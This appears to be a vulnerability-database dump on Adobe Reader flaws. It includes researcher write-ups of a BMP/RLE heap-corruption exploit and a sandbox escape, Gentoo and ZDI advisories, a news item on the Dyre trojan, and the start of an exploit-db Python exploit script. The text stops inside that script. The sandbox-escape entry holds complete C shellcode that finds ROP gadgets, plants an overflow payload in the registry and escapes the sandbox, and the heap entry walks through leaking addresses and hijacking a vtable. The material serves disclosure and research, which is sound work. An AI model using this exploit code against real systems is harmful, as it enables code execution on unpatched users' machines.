![](http://4.bp.blogspot.com/-_3nadyNIlqM/UZJpS_fLSVI/AAAAAAAAAFc/5yGLnvGS3Q4/s320/allocations3.png)\n * An exception in the RLE decoder will delete all the used structures. In particular, the image texture chunk is freed. As its header is corrupted, this deletion will in fact delete the previous chunk and will leave the texture chunk alone. This wrongly deleted chunk is still used by the javascript interpreter. One of the string object leaving in the javascript interpreter still holds a pointer to the recently freed chunk. \n\n> _If you can overflow into a chunk that will be freed, the SegmentOffset in the heap chunk header can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated. See [`https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf`](<https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf>) _\n\n![](http://3.bp.blogspot.com/-_2OW_ASSjwg/UZKGCTAqM3I/AAAAAAAAAFs/eGDYCbiU7IQ/s320/allocations5.png)At this point we have a javascript string using memory that is known to be free. An allocation of 0x12C will probably be assigned to the same memory overlapping the javascript string. We aim for a javascript string to share the same memory with an object containing vtables so we can learn the location of some dll from the js interpreter. As we have chosen the chunk size carefully, this happens automatically and an interesting object gets allocated in the memory actually pointed by one of the javascript strings ![](http://3.bp.blogspot.com/-a71tzw8BY14/UZKGTM7VQBI/AAAAAAAAAF0/2a67tuEWbVM/s320/allocations6.png)\n * Now lets' iterate over all javascript strings looking for the one that has changed \n 1. for (i=0; i < spray.size; i+=1)\n\n 2. if ( spray.x[i] != null &&\n\n 3. spray.x[i][0] != \"\\u5858\"){\n\n 4. ...\n\n 5. }\n\n * If found, parse its contents and discover the address of AcroRd32.dll \n 1. acro = (( util.unpackAt(spray.x[i], 14) >> 16) - offset) << 16;\n\n 2. break;\n\nAt this point we have pinpointed the exact string index that shares the memory with an imgstruct and leaked the address of AcroRd.dll to the javascript interpreter. \n\n\n### Overwrite the struct \n\nIn javascript, strings are simply not writable. You need to free the old string and make a new copy of the string with the modifications you like. Usually, if the new string is the same size as the old one it will be allocated in the same spot. So to change the object contents we need to free the selected javascript string and realloc another in the same memory with different content. \n\n\n * Free the selected javascript string (which shares memory with the object) ![](http://3.bp.blogspot.com/-mYxQTL4XEDM/UZKHUJsq81I/AAAAAAAAAGA/YkELe9_BV6c/s320/allocations7.png)\n * Build a new 0x12C length string with the desired content using the leaked addresses, and spray it a bit so it is eventually allocated over the desired object ![](http://2.bp.blogspot.com/-V_n7zzRQxhU/UZKHeJQtlEI/AAAAAAAAAGI/fBzQ0_aNvIE/s320/allocations7B.png)\n * Allocate several new strings with the new content. ![](http://4.bp.blogspot.com/-heEnUBeDTus/UZKHtj1QyEI/AAAAAAAAAGQ/XTlKBEVku88/s320/allocations8.png)\nThe object is most likely replaced by a new one pointing to a ROP sequence. \n\n\n### Controlling the execution flow\n\nCalling the `doc.close()` function from the js interpreter will trigger the unload of all loaded XFA images and the use of the overwritten `vtable` Thus the replaced pointers in the object are used once more in the destructors and the control flow is captured. One last step involves to heap spray a pointer bed at a known address. A more specific technique(provided upon request) in which other heap addresses are leaked to the interpreter doesn't need this step.", "modified": "2013-05-15T15:01:38", "published": "2013-05-14T19:11:00", "id": "BINAMUSE:8184F78DBF0ABBE82A496D8C609F4BEA", "href": "http://blog.binamuse.com/2013/05/readerbmprle.html", "type": "binamuse", "title": "Adobe Reader BMP/RLE heap corruption - CVE-2013-2729", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-29T13:19:49", "bulletinFamily": "info", "description": "# AdobeCollabSync stack overflow \n\n![](http://2.bp.blogspot.com/-H7ZCmKDydAQ/UZOqOX8pJBI/AAAAAAAAAHw/d3T3rPb9Rgo/s320/sandbox.png)\n\nAdobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product. \n\n\n * Title: AdobeCollabSync stack overflow \n * CVE Name: CVE-2013-2730 \n * Permalink: http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html \n * Date published: 2013-05-15 \n * Date of last update: 2013-05-15 \n * Class: Sandbox bypass \n\nOne of the Adobe Reader X companion programs, `AdobeCollabSync.exe`, fails to validate the input when reading a registry value. This value can be altered from the low integrity sandboxed process. Arbitrary code execution in the context of `AdobeCollabSync.exe` process is proved possible after controlling certain registry key value. Quick links: [White paper](<http://www.binamuse.com/papers/COLLABReport.pdf>), [Exploit](<https://github.com/feliam/CVE-2013-2730>) and a [PoC](<https://github.com/feliam/CVE-2013-2730/blob/master/bin/CVE-2013-2730-PoC.zip?raw=true>) as injectable Dll. \n\n\n## Vulnerability Details \n\nThe issue is a sandbox bypass that enables a privilege escalation from the sandboxed low integrity process (target) to a medium integrity process (`AdobeCollabSync.exe`). A registry value writable from the target is read by `AdobeCollabSync.exe` into a stack based buffer without checking its size. A normal stack overflow occur and the control flow of a medium integrity process is controlled. \n[![](http://3.bp.blogspot.com/-5PP0QVXpvo0/UZQJIi07nJI/AAAAAAAAAII/CH-x2A1N8EU/s320/tracker01.png)](<http://3.bp.blogspot.com/-5PP0QVXpvo0/UZQJIi07nJI/AAAAAAAAAII/CH-x2A1N8EU/s1600/tracker01.png>) \n\n\n## The Sandbox\n\nAdobe reader X uses a slightly modified version of the Google Chrome sandbox. The Sandbox operates at process-level granularity. Anything that has to be sandboxed needs to live on a separate process. The minimal sandbox configuration has two processes: one that is a privileged controller known as the broker, and one or more sandboxed processes known as the target. At the beginning the main Reader process called the broker spawns a less privilege process called the target. The target can do few things by itself, so it is forced to relay most accesses to the operating system resources through the broker process using IPC. The broker receives these requests to access the different resources over IPC and then checks if the request passes a configured security policy. This policy is a set of rules established at the process start. More details on Adobe Reader Sandbox rules and exceptions can be found in this [post](<http://blog.binamuse.com/2013/01/uncover-adobe-reader-x-sandbox.html>). \n\n\n## The rule\n\nThe one we are interested follows: \n\n> `HKEY_CURRENT_USER\\Software\\Adobe\\Adobe Synchronizer\\10.0\\* rw REGISTRY `\n\nBasically this enables the target process to read and write any value down the specified key. Now we need a process with higher integrity that reads it. \n\n\n## Review Tracker \n\nThe Review Tracker shipped with Adobe reader lets you manage document reviews. From this window, you can see who\u2019s joined a shared review and how many comments they've published. You can also rejoin a review, access comment servers used in reviews, and email participants. This functionality is implemented using a companion program which is spawn when the tracker is open from the gui. You can access the Tracker from the Reader menu: View/Tracker... . All the gui parts run in the target process so when you click the menu item the broker is asked to spawn a AdobeCollabSync.exe process. If an attacker is able to run arbitrary code on behalf of the target process is also able to spawn as many AdobeCollabSync.exe process as needed. This is done using the function `acrord_exe+0x18da0` in the target (that's version [10.1.4](<ftp://ftp.adobe.com/pub/adobe/reader/win/10.x/10.1.4/en_US/AdbeRdr1014_en_US.exe>)). \n\n\n## On the AdobeCollabSync.exe process\n\nConsider the trace of `AdobeCollabSync.exe` on the sysinternals process monitor when it runs normally. \n[![](http://4.bp.blogspot.com/-oDUSTDGN7l8/UZQIvLA0SyI/AAAAAAAAAIA/paNd_b15V5A/s320/procmon.png)](<http://4.bp.blogspot.com/-oDUSTDGN7l8/UZQIvLA0SyI/AAAAAAAAAIA/paNd_b15V5A/s1600/procmon.png>) It shows that `AdobeCollabSync.exe` reads one of the registry keys that are writable by the target process. For example the registry key: ` HKEY_CURRENT_USER\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB ` Now, the functions that read the registry value are vulnerable to a stack based overflow. A screenshot of a process monitor trace follows: \n\n\n## Vulnerable function\n\nThe vulnerable function can be found at `AdobeCollabSync.exe+9C1F0`. It uses `RegQueryValueRegExW` to read values from the registry. The `cbData` parameter should indicate the size of the destination buffer. Because it is left uninitialized, `RegQueryValueRegExW` can write any number of bytes to the stack buffer of size 4 bytes. A stripped pseudo code of the bug is shown in the following listing. \n\n\n 1. int\n\n 2. READKEY_49C1F0(void *this, char *name, int a3) {\n\n 3. void * namew;\n\n 4. int cbData, Type, Data;\n\n 5. 6. namew = AnsiToUnicode(concat(\"b\", name) );\n\n 7. if ( !RegQueryValueExW(*((HKEY *)this_ + 2),\n\n 8. (LPCWSTR)namew,\n\n 9. 0,\n\n 10. &amp;Type,\n\n 11. (LPBYTE)&amp;Data,\n\n 12. &amp;cbData) &amp;&amp; Type == 4 ){\n\n 13. ... // everything ok\n\n 14. return Data!=0;\n\n 15. }\n\n 16. ... //error\n\n 17. return a3;\n\n 18. }\n\n## Exploitation details\n\nThe target (sandboxed process) can write arbitrary amount of data into the selected registry key and spawn any number of `AdobeCollabSync.exe` processes. A fresh `AdobeCollabSync.exe` process will read the crafted registry value unchecked into the stack producing an of-the-book stack overflow with no `/GS` cookie. The only constraint is there is a pointer in upper stack frame that is periodically used by a thread. This stack offset must be left unaltered. Final stack size for overflowing is about `0x500` bytes. This is enough to virtualallocate a new RXW memory and ROP a small code into it. Then a second stage shellcode can be gathered from another registry value. \n\n\n### ASLR\n\nThere are no fixed dlls in `AdobeCollabSync.exe`. Hence an attacker already on the system may learn the address of `ntll` and assume that the newly created process will reuse the same address. This won\u2019t hold with `BIB.dll`and `AXE8SharedExpad.dll`. The address of `VirtualProtect` as well as the addresses of all other system dlls are shared among different processes. The only problem is to find the ROP gadgets that work in any version of windows. But as the attacker already has access to a copy of `ntdll.dll`, the gadgets may be searched at runtime and the ROP built accordingly. We use 3 simple gadgets. More can be added to make the search more robust. \nHEX| Assembler \n---|--- \nC3| RET \n89 0f C3| MOV dword ptr [EDI], ECX \nRET \n5F C3| POP EDI \nRET \n59 C3| POP ECX RET \nNext there is the shellcode that must run in the target process. It searches for the gadgets, builds the ROP, writes to the selected registry key value and trigger the execution of `AdobeCollabSync.exe`. \n\n\n 1. int\n\n 2. shellcode_main(GetModuleHandle_t GetModuleHandle, GetProcAddress_t GetProcAddress){\n\n 3. int i,j,k;\n\n 4. 5. HMODULE acrord_exe = GetModuleHandle(\"AcroRd32.exe\");\n\n 6. DoCollab_t docollab = (DoCollab_t)acrord_exe+0x18da0;\n\n 7. HMODULE ntdll = GetModuleHandle(\"ntdll\");\n\n 8. HMODULE kernel32 = GetModuleHandle(\"kernel32\");\n\n 9. VirtualAlloc_t VirtualAlloc = GetProcAddress(kernel32,\"VirtualAlloc\");\n\n 10. RegCreateKeyExA_t RegCreateKeyExA = GetProcAddress(kernel32,\"RegCreateKeyExA\");\n\n 11. RegSetValueExA_t RegSetValueExA = GetProcAddress(kernel32,\"RegSetValueExA\");\n\n 12. RegCloseKey_t RegCloseKey = GetProcAddress(kernel32,\"RegCloseKey\");\n\n 13. CloseHandle_t CloseHandle = GetProcAddress(kernel32,\"CloseHandle\");\n\n 14. ExitProcess_t ExitProcess = GetProcAddress(kernel32,\"ExitProcess\");\n\n 15. RegGetValueA_t RegGetValueA = GetProcAddress(kernel32,\"RegGetValueA\");\n\n 16. RegDeleteValueA_t RegDeleteValueA = GetProcAddress(kernel32,\"RegDeleteValueA\");\n\n 17. Sleep_t Sleep = GetProcAddress(kernel32,\"Sleep\");\n\n 18. 19. union{\n\n 20. char c[0x1000];\n\n 21. int i[0];\n\n 22. } buffer;\n\n 23. HMODULE collab_proc;\n\n 24. HANDLE key = 0;\n\n 25. 26. // Search for gadgets in ntdll\n\n 27. unsigned char* gadget_ret;\n\n 28. unsigned char* gadget_mov_dword_edi_ecx_ret;\n\n 29. unsigned char* gadget_pop_edi_ret;\n\n 30. unsigned char* gadget_pop_ecx_ret;\n\n 31. 32. //Search gadget MOV DWORD [EDI], ECX; RET\n\n 33. for(gadget_mov_dword_edi_ecx_ret = (unsigned char*)ntdll+0x10000;\n\n 34. gadget_mov_dword_edi_ecx_ret &lt; (unsigned char*)ntdll+0xd6000;\n\n 35. gadget_mov_dword_edi_ecx_ret++){\n\n 36. if ( gadget_mov_dword_edi_ecx_ret[0] == 0x89 &&\n\n 37. gadget_mov_dword_edi_ecx_ret[1] == 0x0f &&\n\n 38. gadget_mov_dword_edi_ecx_ret[2] == 0xc3)\n\n 39. break;\n\n 40. }\n\n 41. //Search gadget RET\n\n 42. gadget_ret = gadget_mov_dword_edi_ecx_ret+2;\n\n 43. 44. //Search gadget POP EDI; RET\n\n 45. for(gadget_pop_edi_ret = ntdll+0x10000;\n\n 46. gadget_pop_edi_ret &lt; ntdll+0xd6000;\n\n 47. gadget_pop_edi_ret++){\n\n 48. if ( gadget_pop_edi_ret[0] == 0x5F &&\n\n 49. gadget_pop_edi_ret[1] == 0xc3)\n\n 50. break;\n\n 51. }\n\n 52. 53. //Search gadget POP ECX; RET\n\n 54. for(gadget_pop_ecx_ret = ntdll+0x10000;\n\n 55. gadget_pop_ecx_ret &lt; ntdll+0xd6000;\n\n 56. gadget_pop_ecx_ret++){\n\n 57. if ( gadget_pop_ecx_ret[0] == 0x59 &&\n\n 58. gadget_pop_ecx_ret[1] == 0xc3)\n\n 59. break;\n\n 60. }\n\n 61. 62. {\n\n 63. int * mem = MEMBASE;\n\n 64. unsigned buffer_used;\n\n 65. //Make rop using BIB.dll adress (same in all proc)\n\n 66. i=0;\n\n 67. buffer.i[i++]=0x58000000+i;\n\n 68. buffer.i[i++]=0x58000000+i;\n\n 69. buffer.i[i++]=0; //Must be zero\n\n 70. buffer.i[i++]=0x58000000+i;\n\n 71. //4\n\n 72. buffer.i[i++]=0x58000000+i;\n\n 73. buffer.i[i++]=0x58000000+i;\n\n 74. buffer.i[i++]=0x58000000+i;\n\n 75. buffer.i[i++]=gadget_ret; //<Starts here\n\n 76. //8\n\n 77. buffer.i[i++]=0x58000000+i;\n\n 78. buffer.i[i++]=0x58000000+i;\n\n 79. 80. 81. buffer.i[i++]=VirtualAlloc;\n\n 82. buffer.i[i++]=gadget_ret; //RET1;\n\n 83. buffer.i[i++]=mem; // lpAddress,\n\n 84. buffer.i[i++]=0x00010000; // SIZE_T dwSize\n\n 85. buffer.i[i++]=0x00003000; // DWORD flAllocationType\n\n 86. buffer.i[i++]=0x00000040; // flProtect\n\n 87. 88. 89. k=0;\n\n 90. for(j=0;j&lt;sizeof(regkey)/4+1;j+=1){\n\n 91. buffer.i[i++]=gadget_pop_edi_ret;\n\n 92. buffer.i[i++]=((int*)mem)+k++;\n\n 93. buffer.i[i++]=gadget_pop_ecx_ret;\n\n 94. buffer.i[i++]=((int*)regkey)[j];\n\n 95. buffer.i[i++]=gadget_mov_dword_edi_ecx_ret;\n\n 96. }\n\n 97. 98. buffer.i[i++]=RegGetValueA;\n\n 99. buffer.i[i++]=(void*)mem+0x1000; //RET\n\n 100. buffer.i[i++]=HKEY_CURRENT_USER; //hkey\n\n 101. buffer.i[i++]=mem; //lpSubKey\n\n 102. buffer.i[i++]=(void*)mem+0x3a; //lpValue\n\n 103. buffer.i[i++]=RRF_RT_ANY; //dwFlags\n\n 104. buffer.i[i++]=0; //pdwType\n\n 105. buffer.i[i++]=(void*)mem+0x1000; //pvData\n\n 106. buffer.i[i++]=(void*)mem+0x44; //pcbData\n\n 107. 108. buffer_used = i*sizeof(buffer.i[i]);\n\n 109. 110. 111. //Set up vulnerable registry key\n\n 112. RegCreateKeyExA(HKEY_CURRENT_USER,\n\n 113. \"Software\\\\\\Adobe\\\\\\Adobe Synchronizer\\\\\\10.0\\\\\\DBRecoveryOptions\\\\\\\",\n\n 114. 0 /*reserved*/,\n\n 115. NULL /*lpclass*/,\n\n 116. REG_OPTION_NON_VOLATILE /*Options*/,\n\n 117. KEY_ALL_ACCESS /*samDesired*/,\n\n 118. NULL /*SecurityAttribs*/,\n\n 119. &key,\n\n 120. NULL); //if not ERROR_SUCCES bail out\n\n 121. RegSetValueExA(key,\"bDeleteDB\", 0, REG_BINARY,buffer.c,buffer_used);\n\n 122. RegSetValueExA(key,\"shellcode\", 0, REG_BINARY,stage2,sizeof(stage2));\n\n 123. RegCloseKey(key);\n\n 124. 125. // Tell the broker to execute AdobeCollabSync\n\n 126. collab_proc = docollab(0xbc);\n\n 127. 128. // Sleep\n\n 129. Sleep(1000);\n\n 130. 131. // Close collab_proc\n\n 132. CloseHandle(collab_proc);\n\n 133. 134. // Clean registry\n\n 135. // RegSetValue\n\n 136. RegCreateKeyExA(HKEY_CURRENT_USER,\n\n 137. \"Software\\\\\\Adobe\\\\\\Adobe Synchronizer\\\\\\10.0\\\\\\DBRecoveryOptions\\\\\\\",\n\n 138. 0 /*reserved*/,\n\n 139. NULL /*lpclass*/,\n\n 140. REG_OPTION_NON_VOLATILE /*Options*/,\n\n 141. KEY_ALL_ACCESS /*samDesired*/,\n\n 142. NULL /*SecurityAttribs*/,\n\n 143. &key,\n\n 144. NULL); //if not ERROR_SUCCES bail out\n\n 145. //RegSetValueExA(key,\"bDeleteDB\", 0, REG_BINARY,buffer.c,0x4);\n\n 146. RegDeleteValueA(key, \"shellcode\");\n\n 147. RegDeleteValueA(key, \"bDeleteDB\");\n\n 148. RegCloseKey(key);\n\n 149. 150. // Sleep\n\n 151. Sleep(1000);\n\n 152. 153. // TODO: check success\n\n 154. ExitProcess(0);\n\n 155. //retry or spawn other target?\n\n 156. }\n\n 157. }\n\nTo compile and pack this C code as an opaque executable chunk of memory (or shellcode) apply [this](<http://blog.binamuse.com/2013/01/about-shellcodes-in-c.html#tryit>). Using the awesome Stephen Fewer's [ReflectiveDLLInjection](<https://github.com/stephenfewer/ReflectiveDLLInjection>)project we can easly compile an injectable dll with this shellcode as payload. You can download a ready to use PoC dll from [here](<http://twitter.com/feliam>). Note that this shellcode expects to get the address of `GetModuleHandle` and `GetProcAddress` functions as parameters (this are typically already known at ROP stage). Injecting this dll into the low integrity reader process will escape the sandbox and spawn a calculator. Next couple of figures are screenshots of an example run of the injected dll. Adobe reader runs a medium and a low integrity process: \n[![](http://2.bp.blogspot.com/-_Or2TNdUGXU/UZQJRZF__pI/AAAAAAAAAIQ/-_442PZSsJw/s320/poc01.png)](<http://2.bp.blogspot.com/-_Or2TNdUGXU/UZQJRZF__pI/AAAAAAAAAIQ/-_442PZSsJw/s1600/poc01.png>)Shellcode dll injected into the low integrity process: \n[![](http://1.bp.blogspot.com/-TNIyORbUb-g/UZQJXEC_vxI/AAAAAAAAAIY/oWHY27Y1QjM/s320/poc02.png)](<http://1.bp.blogspot.com/-TNIyORbUb-g/UZQJXEC_vxI/AAAAAAAAAIY/oWHY27Y1QjM/s1600/poc02.png>)Medium integrity calculator spawn: \n[![](http://2.bp.blogspot.com/-68M4Bm7XReQ/UZQJcI0SGcI/AAAAAAAAAIg/h7LOoXbfyN8/s320/poc03.png)](<http://2.bp.blogspot.com/-68M4Bm7XReQ/UZQJcI0SGcI/AAAAAAAAAIg/h7LOoXbfyN8/s1600/poc03.png>)", "modified": "2014-09-18T03:46:45", "published": "2013-05-15T16:36:00", "id": "BINAMUSE:F9F25FF8A98B0B91A26198BE57648B2E", "href": "http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html", "type": "binamuse", "title": "Adobe Reader X Sandbox bypass - CVE-2013-2730", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader is a closed-source PDF reader.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF file, possibly resulting in arbitrary code execution or a Denial of Service condition. A local attacker could gain privileges via unspecified vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.5.5\"", "modified": "2014-01-30T00:00:00", "published": "2013-08-22T00:00:00", "id": "GLSA-201308-03", "href": "https://security.gentoo.org/glsa/201308-03", "type": "gentoo", "title": "Adobe Reader: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:55", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of regular expressions. The issue lies in the ability to leak addresses by popping more items off of the stack than intended. An attacker can leverage this to execute code under the context of the current user.", "modified": "2013-11-09T00:00:00", "published": "2013-05-30T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-106", "id": "ZDI-13-106", "title": "(Pwn2Own) Adobe Reader Sandbox Bypass Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader 10.1.4 on OSX. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within parsing a U3D file within a PDF. The parsing code fails to validate a value from the file used as size parameter for an allocation routine. This could lead to an integer overflow resulting in an out-of-bound index into a list of objects. This results in an attacker being able to specify an arbitrary value for a function pointer, which leads to the execution of arbitrary code.", "modified": "2013-11-09T00:00:00", "published": "2013-05-30T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-105", "id": "ZDI-13-105", "title": "Adobe Reader U3D Processing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:56", "bulletinFamily": "info", "description": "The Department of Homeland Security formally sounded the alarm Monday on Dyre, the banking Trojan that\u2019s been spotted siphoning banking credentials from both large enterprises and major financial institutions as of late.\n\nThe warning came in the form of an alert from the United States Computer Emergency Readiness Team (US-CERT) informing the public of the malware, which is spread through spam and phishing emails.\n\nAccording to [US-CERT](<https://www.us-cert.gov/ncas/alerts/TA14-300A>), phishing emails peddling Dyre are now using malicious PDF attachments that leverage vulnerabilities (namely CVE-2013-2729) in old, unpatched versions of Adobe Reader to download the malware. Once it\u2019s downloaded, it captures user login information and sends that on to attackers.\n\nIt should come as no surprise that experts are encouraging users to use caution when it comes to opening attachments \u2013 especially those with suspicious-looking names like Invoice621785.pdf \u2013 and following links in emails.\n\nAfter it\u2019 has been installed, the malware copies itself under C:\\\\\\Windows\\\\[RandomName].exe and disguises itself as a fake program, Google Update Service.\n\nThe Trojan has existed in one form or another since early summer, but US-CERT is claiming this particular campaign started targeting recipients in mid-October.\n\n[Last month Salesforce](<http://threatpost.com/salesforce-warns-customers-of-dyreza-banker-trojan-attacks/108134>), a customer relationship management company, claimed the malware, also known as Dyreza, was taking aim at its customers. In that series of attacks, criminals used the malware to conduct man-in-the-middle attacks to \u201cread anything, even SSL traffic in clear text,\u201d [according to a write-up by the CSIS Security Group](<http://threatpost.com/dyreza-banker-trojan-seen-bypassing-ssl/106671>).\n\nAnother variant of the malware [was spotted days later](<http://threatpost.com/dyre-trojan-caught-in-the-cookie-jar/108373>) that was fine-tuned to steal client certificates and browser cookies, suggesting that some versions of Dyre may be much more refined than the versions that [surfaced in June](<http://threatpost.com/dyreza-banker-trojan-seen-bypassing-ssl/106671>).\n", "modified": "2014-10-28T17:09:59", "published": "2014-10-28T13:09:59", "id": "THREATPOST:CA0BD9A827AAC3942472B54A5629767D", "href": "https://threatpost.com/us-cert-warns-of-dyre-banking-trojan/109056/", "type": "threatpost", "title": "US-CERT Warns of Dyre Banking Trojan", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T04:11:42", "bulletinFamily": "exploit", "description": "Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption. CVE-2013-2729. Local exploit for windows platform", "modified": "2013-07-08T00:00:00", "published": "2013-07-08T00:00:00", "id": "EDB-ID:26703", "href": "https://www.exploit-db.com/exploits/26703/", "type": "exploitdb", "title": "Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption", "sourceData": "'''\r\nTitle: Adobe Reader X BMP/RLE heap corruption\r\nProduct: Adobe Reader X\r\nVersion: 10.x\r\nProduct Homepage: adobe.com\r\nBinary affected: AcroForm.api\r\nBinary Version: 10.1.4.38\r\nBinary MD5: 8e0fc0c6f206b84e265cc3076c4b9841\r\nConfiguration Requirements\r\n-----------------------------------------\r\nDefault configuration.\r\n\r\nVulnerability Requirements\r\n-----------------------------------------\r\nNone.\r\n\r\nVulnerability Description\r\n-----------------------------------------\r\nAdobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. \r\n\r\n\r\nVulnerability WorkAround (if possible)\r\n-----------------------------------------\r\nDelete AcroForm.api\r\n'''\r\nfrom hashlib import md5\r\nimport sys, struct\r\n######### Begin of the miniPDF\r\nimport zlib\r\n\r\n#For constructing a minimal pdf file\r\n## PDF REference 3rd edition:: 3.2 Objects\r\nclass PDFObject:\r\n def __init__(self):\r\n self.n=None\r\n self.v=None\r\n def __str__(self):\r\n raise Exception(\"Fail\")\r\n\r\n## PDF REference 3rd edition:: 3.2.1 Booleans Objects\r\nclass PDFBool(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n if self.s:\r\n return \"true\"\r\n return \"false\"\r\n\r\n## PDF REference 3rd edition:: 3.2.2 Numeric Objects\r\nclass PDFNum(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"%s\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.3 String Objects\r\nclass PDFString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"(%s)\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings\r\nclass PDFHexString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"<\" + \"\".join([\"%02x\"%ord(c) for c in self.s]) + \">\"\r\n\r\n## A convenient type of literal Strings\r\nclass PDFOctalString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=\"\".join([\"\\\\%03o\"%ord(c) for c in s])\r\n def __str__(self):\r\n return \"(%s)\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.4 Name Objects\r\nclass PDFName(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"/%s\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.5 Array Objects\r\nclass PDFArray(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n assert type(s) == type([])\r\n self.s=s\r\n def append(self,o):\r\n self.s.append(o)\r\n return self\r\n def __str__(self):\r\n return \"[%s]\"%(\" \".join([ o.__str__() for o in self.s]))\r\n\r\n## PDF REference 3rd edition:: 3.2.6 Dictionary Objects\r\nclass PDFDict(PDFObject):\r\n def __init__(self, d={}):\r\n PDFObject.__init__(self)\r\n self.dict = {}\r\n for k in d:\r\n self.dict[k]=d[k]\r\n\r\n def __iter__(self):\r\n for k in self.dict.keys():\r\n yield k\r\n\r\n def __iterkeys__(self):\r\n for k in self.dict.keys():\r\n yield k\r\n\r\n def __getitem__(self, key):\r\n return self.dict[key]\r\n \r\n def add(self,name,obj):\r\n self.dict[name] = obj\r\n\r\n def get(self,name):\r\n if name in self.dict.keys():\r\n return self.dict[name]\r\n else:\r\n return None\r\n\r\n def __str__(self):\r\n s=\"<<\"\r\n for name in self.dict:\r\n s+=\"%s %s \"%(PDFName(name),self.dict[name])\r\n s+=\">>\"\r\n return s\r\n\r\n## PDF REference 3rd edition:: 3.2.7 Stream Objects\r\nclass PDFStream(PDFDict):\r\n def __init__(self,d={},stream=\"\"):\r\n PDFDict.__init__(self,d)\r\n self.stream=stream\r\n self.filtered=self.stream\r\n self.add('Length', len(stream))\r\n self.filters = []\r\n\r\n def appendFilter(self, filter):\r\n self.filters.append(filter)\r\n self._applyFilters() #yeah every time .. so what!\r\n\r\n def _applyFilters(self):\r\n self.filtered = self.stream\r\n for f in self.filters:\r\n self.filtered = f.encode(self.filtered)\r\n if len(self.filters)>0:\r\n self.add('Length', len(self.filtered))\r\n self.add('Filter', PDFArray([f.name for f in self.filters]))\r\n #Add Filter parameters ?\r\n def __str__(self):\r\n self._applyFilters() #yeah every time .. so what!\r\n s=\"\"\r\n s+=PDFDict.__str__(self)\r\n s+=\"\\nstream\\n\"\r\n s+=self.filtered\r\n s+=\"\\nendstream\"\r\n return s\r\n\r\n## PDF REference 3rd edition:: 3.2.8 Null Object\r\nclass PDFNull(PDFObject):\r\n def __init__(self):\r\n PDFObject.__init__(self)\r\n\r\n def __str__(self):\r\n return \"null\"\r\n\r\n\r\n## PDF REference 3rd edition:: 3.2.9 Indirect Objects\r\nclass UnResolved(PDFObject):\r\n def __init__(self,n,v):\r\n PDFObject.__init__(self)\r\n self.n=n\r\n self.v=v\r\n def __str__(self):\r\n return \"UNRESOLVED(%d %d)\"%(self.n,self.v)\r\nclass PDFRef(PDFObject):\r\n def __init__(self,obj):\r\n 